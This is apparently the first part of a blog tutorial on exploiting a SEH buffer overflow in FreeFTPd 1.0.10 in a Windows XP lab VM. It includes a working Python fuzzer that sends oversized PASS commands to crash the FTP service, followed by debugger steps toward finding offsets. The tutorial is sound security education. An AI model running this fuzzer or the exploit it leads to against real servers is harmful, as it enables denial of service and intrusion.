SEH Buffer Overflow - FreeFTPd 1.0.10 - Part 1

In this blog post series we will look into exploiting a SEH buffer overflow for the FreeFTPd 1.0.10 application.

Therefore we load the application into the Immunity Debuuger on a Windows XP test vm. This operating system does not use memory protections like ASLR to protect from simple buffer overflow attacks.

We use this fuzzer to test for the buffer overflow to verify the exploit code and write our own exploit code.

#!/usr/bin/python2
# -*- coding: utf-8 -*-
import sys
import socket
BUFFERSIZE=1024

if __name__ == "__main__":
    maxbuffersize=10000
    buffer_inc = 5000
    bufferarray=[]
    buffercount = maxbuffersize / buffer_inc
    IPV4='192.168.0.137' # IP of the windows xp VM
    PORT=21 # running process

    while len(bufferarray)< buffercount+1:
       bufferarray.append('\x41'*buffer_inc*len(bufferarray))

    for buffer in bufferarray:
        CLIENT = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
        CLIENT.connect((IPV4,PORT))
        CLIENT.recv(BUFFERSIZE)
        print("Fuzzing with %4d"%len(buffer))
        CLIENT.send('USER anonymous\r\n')
        data = CLIENT.recv(BUFFERSIZE)
        print("data: %s"%data)
        CLIENT.send('PASS '+buffer+'\r\n')
        data = CLIENT.recv(BUFFERSIZE)
        print("data: %s"%data)
        CLIENT.close()

After running said script with the right IPV4 and PORTwe will get an overflow which will look like: Overflow Address And in the registers we will see something like: Registers View

We can now also verify that it in fact is a SEH overflow by opening the SEH chain for the exception: SEH Chain

We already overwrote the SEH return address with the current buffer. Now we only need to find the offsets for said addresses.

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb